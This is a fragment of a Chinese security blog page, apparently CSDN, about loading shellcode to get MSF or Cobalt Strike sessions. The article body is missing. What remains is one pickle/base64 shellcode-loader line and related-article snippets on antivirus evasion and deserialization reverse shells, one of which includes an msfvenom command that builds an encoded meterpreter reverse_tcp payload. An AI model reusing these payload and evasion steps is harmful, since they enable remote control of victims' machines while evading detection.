pickle.loads(base64.b64decode(shellcode))


上线过程


以下以MSF的payload为例


以下以CS的payload为例

若有收获,就点个赞吧

加油上分版
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反序列化利用工具_Shiro反序列化漏洞利用汇总
weixin_42628280的博客
01-25 4009
“ Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。”文章目录:1、Shiro rememberMe反序列化漏洞(Shiro-550)1.1 漏洞原理1.2 影响版本1.3 漏洞特征1.4 漏洞利用1.4.1 利用方式一:反弹shell1.4.2 利用方式二:写入文件2、Shiro Pa...
MSF外网渗透+shellcode免杀
weixin_45605352的博客
04-19 4638
1. 内网穿透 使用的Sunny-Ngrok服务 。你在Sunny-Ngrok官网注册好后获得一条免费或付费的隧道,添加tcp通道,端口号自定。 官网链接:https://www.ngrok.cc/(Sunny-Ngrok服务 ) 在kali下安装Sunny-Ngrok的客户端,在该目录下启动Sunny-Ngrok。 2. 外网渗透 生成外网木马。注意这里的lhost和lport为赠送的域名和远程端口号: msfvenom -p windows/meterpreter/reverse_tcp lho
免杀基本知识,shellcode混淆免杀
最新发布
白帽子凯哥聊黑客
06-17 1086
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
MSF实战免杀过静态:ShellCode加花指令
xf555er的博客
03-30 1182
第一部分(api_call)是一个通用API调用函数,用于动态查找和调用API。第二部分(reverse_tcp)创建一个反向TCP连接,将本地机器连接到攻击者的监听器。第三部分(recv)负责接收并执行第二阶段Payload。这三部分共同实现了一段完整的Shellcode,用于反向连接攻击者机器并执行远程指令。
msf shellcode分离免杀技术
good good study
05-27 1927
一般的shellcode是直接放在程序里面执行,分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火绒和360 msf免杀 shellcode分离免杀
命令执行与反序列化
songbai220
12-10 776
命令执行与反序列化 原理 设计者在编写代码时没有做严格的安全控制,导致攻击者通过接口或相关参数提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器 。 &、|、“ 空格”等组合连接实现 只要带参数的地方都可能出现命令执行漏洞 路由器、防火墙、自动化运维平台、入侵检测等web管理页面 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 assert system ``(反单引号) exec shell_exec pcntl_exec pass
php-msf源码详解
10-18
标题所指的“php-msf源码详解”和描述中提及的“用法相关问题”意指深入剖析PHP开发的Metasploit(php-msf)框架的源代码以及其使用的相关知识。Metasploit是一款非常流行的渗透测试框架,而php-msf则可能是该框架在...
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual,PHP微服务框架即,是Camera360社区服务器端团队基于Swoole自主研发的现代化PHP服务框架,简称msf或者php-msf,它的核心设计思想是采用...
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
74-74.渗透测试-MSF核心模块.mp4
05-10
74-74.渗透测试-MSF核心模块.mp4
73-73.渗透测试-MSF目录结构.mp4
05-10
73-73.渗透测试-MSF目录结构.mp4
一款开源的ShellCode生成引擎
11-29
1.本工具只支持x86 coff格式的文件 2.全局变量记得初始化,测试的时候发现有事全局变量没有初始化会获取不到 3.关闭MSVC的全局优化,开启全局优化时OBJ中的信息无法获取 4.不要在代码中使用c++一些特性,类似异常等,测试类时发现基本的类是可以满足的不要使用c++的一些库,切记
vulhub——shiro反序列化getshell漏洞复现
web17535224648的博客
08-26 1247
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。...
反序列化漏洞反shell笔记 持续更新
tutuwanc的博客
11-28 377
这个是没有安装 netcat的nodejs的反序列化代码。安装 netcat的nodejs的反序列化代码。
反序列化漏洞
slash_HK的博客
12-21 2325
Java php反序列化漏洞复现细节及技术点记录,超详细!
MSF生成meterpreter及静态免杀
渗透笔记
01-26 5479
1.静态免杀 1.1编译c文件,静态免杀 1.1.1 生成shellcode 在kali命令行输入 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '/x00' lhost=192.168.1.160 lport=7777 -f c -o /home/shell/test01.c -
shellcode反编译成c语言代码的两种方式
weixin_43090100的博客
10-04 5588
下述所用的工具包含:IDA pro,Dev C++ 以下介绍两种方法 开始操作之前,需要知道的几个小前提 一个可执行文件包含多个字段(field), text段是程序代码段,包含着要运行程序的指令。shellcode像你说的,转成汇编语言很容易,因为shellcode本质就是一段恶意的机器码——cpu指令 逆向工程(reverse engineering)常用到的分析工具大体有两个:olly...
DAY35:序列化与反序列化
qq_49433473的博客
08-19 491
序列化与反序列化、概述、相关函数介绍、反序列化漏洞、魔术方法、session 反序列化、防御方法、示例:网鼎杯朱雀组 phpweb、session 反序列化示例
J-MSF: 新型多通道多尺度红外弱目标检测算法提升准确性
本文档探讨了一种新型的多通道多尺度红外弱小目标检测算法——J-MSF(J-Modeled Scaled Feature Fusion)。红外弱小目标检测在军事领域至关重要,如预警、导弹制导等,由于目标特征稀少和背景复杂,传统检测方法如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值